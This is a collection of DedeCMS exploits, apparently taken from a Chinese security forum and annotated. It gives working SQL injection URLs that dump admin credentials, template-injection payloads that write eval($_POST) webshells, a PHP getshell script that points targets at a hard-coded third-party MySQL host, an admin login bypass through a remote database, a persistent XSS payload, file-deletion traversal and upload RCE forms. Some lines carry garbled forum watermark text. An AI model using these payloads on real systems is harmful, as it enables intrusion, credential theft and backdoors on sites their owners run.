Dedecms 5.6 rss注入漏洞 (plus/rss.php: error-based SQL injection, the payload sits inside an array key of the _Cs[] parameter)
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
Note: the injection is in the key name of the _Cs array, not its value; updatexml() is used to echo "[uname:MID(pwd,4,16)]" back in the MySQL error. MID(pwd,4,16) takes the 16-character MD5 out of the 20-character string DedeCMS stores in dede_admin.pwd (see the note on the password format under the advancedsearch.php section below).
DedeCms v5.6 嵌入恶意代码执行漏洞
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
发表后查看或修改即可执行
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密码xiao,直接生成一句话。
Note: the "local address" field of a member software upload is handled by the template engine; {/dede:link} closes the tag the field is embedded in and {dede:toby57 name\="']=0;...//"} presumably breaks out of the generated attribute-assignment code (the ']=0; fragment closes an array index) so the rest of name is executed as PHP. The two base64 strings decode to the file name x.php and to <?php eval($_POST[xiao])?>baidu, i.e. a one-line webshell keyed on POST parameter xiao. Detection hint: {/dede:link}, runphp= or {dede:...} fragments in member-submitted fields.
Dede 5.6 GBK SQL注入漏洞 (member/index.php, uid parameter; GBK build only)
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
Note: %E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7 is the UTF-8 encoding of 涛声依旧. The heading ties this to the GBK build, so the trigger is presumably a multi-byte / charset-mismatch problem in how uid is escaped before the query - confirm against member/index.php of that build. "WFXSSProbe" in the second URL looks like a scanner probe token left in the log rather than part of the payload.
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 (the sql parameter is executed as the query)
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
Note: %23@__admin is #@__admin, DedeCMS's table-prefix placeholder, i.e. dede_admin on a default install. The same request is repeated further down this page together with a note on the stored password format.
DEDECMS 全版本 gotopage变量XSS漏洞 (dede/login.php, reflected XSS in gotopage made persistent through a cookie)
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
Note: the String.fromCharCode payload in the URL below decodes to JavaScript that sets Persistence_data = '"><script>alert(/xss rootkit!/)</script><x="', stores it in document.cookie as gotopage=... with a 365-day expiry, and then shows "Xss Rootkit Install Successful !!!!". Nothing else is installed; the "rootkit" is just that persistent cookie.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
Note: step 2 works because login.php evidently reads gotopage from the cookie as well as from the query string, so the value planted in step 1 is reflected on every later visit from that browser until the cookie is cleared. Clearing cookies for the site ends it.
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS(织梦)变量覆盖getshell (plus/mytag_js.php; the PHP script below sends the _COOKIE[GLOBALS][cfg_db*] override request. "[color=Red]" in the original was a leftover BBCode tag.)
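#!/usr/bin/php
<?php
// DedeCMS "variable coverage" getshell exploit (forum paste, de-garbled:
// the copy on this page was interleaved with forum watermark characters
// that made it unparseable).
//
// Targets plus/mytag_js.php. The request body built in Getshell() overrides
// the database connection settings through _COOKIE[GLOBALS][cfg_db*], so
// the target apparently fetches its "mytag" record from a MySQL host chosen
// by the attacker; whatever {dede:php} body sits in that remote dede_mytag
// row is rendered by the target (see the manual form-based variant of the
// same attack later on this page).
//
// Usage: php <script> url aid path
//   url   target host name (also used as the Host header)
//   aid   mytag id; it also selects which shell path is printed on success
//   path  sub-directory the CMS lives in under the web root (e.g. "old")
//
// NOTE(review): cfg_dbhost/cfg_dbuser/cfg_dbpwd/cfg_dbname in Getshell() are
// hard-coded to a third-party MySQL host (184.105.174.114, exploit/90sec).
// Running this as-is points the target at someone else's server; replace
// them with a database you control before any authorised test.
// NOTE(review): the original shebang was "#!usr/bin/php -w" - no leading
// slash, and "-w" asks php-cli to print stripped source rather than enable
// warnings - so it is corrected here.
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.comwww.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// Getshell() returns only the first line of the HTTP response. The remote
// {dede:php} payload is expected to echo "OK", and the > 12 threshold is
// meant to skip the status line prefix. NOTE(review): on a normal server
// that first line is "HTTP/1.1 200 OK", where "OK" sits at offset 13, so
// this check reports success on any 200 response whether or not the
// payload ran - treat "Exploit Success" as unverified. Left as in the
// original paste.
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}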
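/**
 * Send the variable-override POST to plus/mytag_js.php and return the first
 * line of the HTTP response. (De-garbled from the forum paste; logic kept
 * as in the original.)
 *
 * @param string $url  target host name; used as the Host header and as the
 *                     host embedded in the "doaction" parameter
 * @param string $aid  mytag id placed in the query string
 * @param string $path sub-directory of the CMS under the web root
 * @return string|null the first response line read, or null when nothing
 *                     could be read
 *
 * NOTE(review): a failed fsockopen() only prints a message - fwrite()/feof()
 * are still attempted on the false handle - and the socket is never closed.
 * The while loop returns on the first fgets(), so only the status line is
 * ever inspected by the caller.
 */
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
// Request body: doaction carries the target's own mytag_js.php URL (the
// same value the manual form on this page puts in its doaction field);
// the _COOKIE[GLOBALS][cfg_db*] fields are the variable override that the
// target apparently adopts as its database connection settings; nocache=true
// presumably bypasses the cached copy of the tag. %CC%E1%BD%BB is GBK for
// "提交" (the submit button's value in the manual form).
// NOTE(review): the DB host and credentials below belong to a third party;
// replace them with your own test database before use.
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>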
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台) (admin login.php with _POST[GLOBALS][cfg_db*] override)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Note: "织梦网站后台" stands for the target's admin directory. The _POST[GLOBALS][cfg_db*] values redirect the login's database lookup to 116.255.183.90 (root / r0t0), a host that is not under the reader's control and that presumably holds an admin account admin/inimda; substitute a database you control for any authorised test, and never send a client's login to that host.
把上面validate=dcug改为当前的验证码,即可直接进入网站后台 (the captcha is the only per-request value; it is read from the login page of the same session).
此漏洞的前提是必须得到后台路径才能实现 (the admin directory is renamable; the attacker must know its path).
Dedecms织梦 标签远程文件写入漏洞 (plus/mytag_js.php pointed at an attacker-controlled MySQL server; manual form version of the PHP script above)
前提条件:必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
Note: the doubled single quotes look like the forum's escaping of a single ' (the intended statement is presumably values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'...\');echo "OK";@fclose($fp);{/dede:php}')). The fwrite() payload is empty in this paste, so as written the row only creates an empty 1.php; echo "OK" is the marker the PHP exploit above looks for. This row lives in the attacker's own MySQL server, which the target is then pointed at through the _COOKIE[GLOBALS][cfg_db*] fields of the form below.
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
Note: the form has to be posted to the target's plus/mytag_js.php (the doaction field holds that URL and addaction() copies it into the form action); 1.php is created in the directory mytag_js.php runs from, i.e. plus/.
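<!-- Manual form for the mytag_js.php variable-override getshell (the PHP
     script above sends the same request). Fill the _COOKIE[GLOBALS][cfg_db*]
     fields with a MySQL server you control that holds the dede_mytag row
     shown above; the target's mytag_js.php apparently connects to that
     server instead of its own database and renders the {dede:php} body.
     NOTE(review): addaction() is defined but never invoked in this paste and
     the form's action is empty; the original presumably wired it up via
     onsubmit or ran it by hand - confirm before use. -->
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
// Copies the doaction field into the form's action so the POST goes to the
// target's mytag_js.php.
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>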
DedeCms v5.6 嵌入恶意代码执行漏洞 (duplicate of the section near the top of this page)
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密码:xiao直接生成一句话。 (the base64 strings decode to x.php and <?php eval($_POST[xiao])?>baidu, i.e. a POST-parameter "xiao" eval webshell)
Dedecms <= V5.6 Final模板执行漏洞 (member article edit: the article's template path is made to point at a member-uploaded "image" that is really a template with runphp='yes')
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
uploads/userup/2/12OMX04-15A.jpg
模板内容是(如果限制图片格式,加gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
Note: runphp='yes' makes the template engine execute the tag body as PHP. This body appends a one-line eval($_POST[cmd]) shell to 1.php in the current working directory (hence plus/1.php when the article is viewed via plus/view.php, per step 3). Prefixing the file with "GIF89a" lets it pass an image-signature check when uploads are restricted to images.
2 修改刚刚发表的文章,查看源文件,构造一个表单:
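<!-- Step 2 of the template-execution attack: the member's own article edit
     form (copied from page source) with two fields added at "(这里构造)".
     dede_addonfields="templet,htmltext;" evidently makes article_edit.php
     accept "templet" as an addon field, so the uploaded .jpg template path is
     saved as the article's template; viewing the article afterwards renders
     it with runphp enabled. idhash, sortrank and aid are instance-specific
     values taken from the real form and must be copied from the target.
     NOTE(review): the hidden "body" input is reproduced as in the paste; its
     value attribute contains unescaped quotes (the author pasted raw page
     source), so a browser will not parse it as intended. -->
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<!-- The two injected fields: the template path (relative to the templates
     directory, pointing at the member upload) and the addon-field list that
     gets it saved. -->
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(这里构造)
</div>
<!-- 表单操作区域 -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>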
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
假设刚刚修改的文章的aid为2,则我们只需要访问:
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell:1.php
Note: plus/view.php renders the article with the template saved in step 2; the runphp block in it runs with plus/ as the working directory, which is why 1.php appears there.
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6) (same template-path trick as above, using member/uploads_edit.php to replace an attachment and {dede:field} with runphp='yes')
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
保存为1.gif
Note: "Gif89a" is the GIF file signature so the upload passes an image check; the rest is a template whose {dede:field ... runphp='yes'} body is executed as PHP when the file is later used as an article template (phpinfo() here is only the proof of execution).
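<!-- Step 1: replace an attachment the member already uploaded (aid=7) with
     the GIF-prefixed template 1.gif. oldurl is the existing file's path, so
     the replacement keeps that name and location (the paste's stray quote in
     the form tag and the "</br>" have been corrected). -->
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>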
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
发表文章,然后构造修改表单如下:
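<!-- Step 2: edit an existing member article (aid=2) and smuggle the
     template path in. dede_addonfields=templet evidently makes
     article_edit.php treat "templet" as an addon field, so the uploaded
     1.gif is stored as the article's template; viewing the article then
     renders it with runphp enabled. aid, idhash and sortrank are
     instance-specific values copied from the real edit form. This is the
     same dede_addonfields/templet trick used in the template-execution
     section above (a missing </select> from the paste has been added). -->
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>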
织梦(Dedecms)V5.6 远程文件删除漏洞 (member/edit_face.php, path traversal in oldface)
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
Note: oldface is used as a file path without normalising the "../" segments, so a logged-in member can delete files outside their own upload directory (here the member template logo). Any deletable file under the web root is in scope, which is why this is listed alongside the getshell issues.
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
5 ~$ o6 u) i2 k& S0 Xhttp://www.test.com/plus/carbuya ... urn&code=../../
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 (repeat of the section above, with the password-format note)
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
密码是32位MD5减去头5位、减去尾7位,得到20位的密码串;再把这20位前减3位、后减1位,得到16位MD5。
Note: in other words the stored value is md5[5..25) of the full 32-char hex digest, and the standard 16-char MD5 is md5[8..24); trimming 3 from the front and 1 from the back of the 20-char value lands on exactly that, which is also why the rss.php payload above uses MID(pwd,4,16). Crack or look up the 16-char form rather than trying to "reverse" the 20-char string.
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞 (plus/feedback_js.php, arcurl parameter; the nested UNION below pulls userid/pwd from dede_admin into the feedback listing)
' l0 g3 d8 {0 W- X2 @# Uhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞 (include/dialog/select_soft_post.php; uninitialised cfg_* variables supplied via POST, needs register_globals=on)
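<!-- select_soft_post.php upload exploit for DedeCMS v5.5 ("uninitialised
     variable" bug). The hidden cfg_* inputs supply the upload policy
     (allowed extension "php", base directory "../../") that the script
     presumably expects from its configuration, and activepath/newname choose
     where the uploaded file lands. It needs register_globals = on, as the
     page itself says below: with it off, POSTed cfg_* names never become PHP
     variables and the override does nothing. -->
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>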
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞 (SQL error forced via a numeric overflow; the error text, including attacker input, is written to data/mysql_error_trace.php and that file is served as PHP)
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
1. 访问网址:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
可看见错误信息
Note: the URL was truncated by the forum ("digg_fra ... 024%651024"); from the logged query in step 2 the id value is 1024e1024, which MySQL rejects as an illegal double, and the mid value carries the PHP to be written into the error log. The "*/" at the start of mid and the "*/ ?>" at the end of the logged line suggest the log wraps the query in a comment block that the payload breaks out of - confirm against the log-writing code of that version.
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
Note: "int(3)" is the output of the injected var_dump(3), i.e. the PHP in the log file ran; eval($_POST[x]) in the same line is the backdoor used by step 3. gxeduw_ is that site's table prefix.
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是 (test.html from dede.rar is not included on this page; only its form tag is shown below. It posts the code to run in parameter x, matching the eval($_POST[x]) planted in step 1.)
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
按确定后的看到第2步骤的信息表示文件木马上传成功.
织梦(DedeCms)plus/infosearch.php 文件注入漏洞 (q parameter, UNION-based, wide-byte quote escape bypass)
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
Note: the %cf placed before the quote is the wide-byte trick: when the application escapes the quote as \' under a GBK connection, the 0xCF byte and the 0x5C backslash presumably form one double-byte character, leaving the quote unescaped so the UNION runs. Columns 3 and 5 of the six-column SELECT are where userid and pwd surface in the page.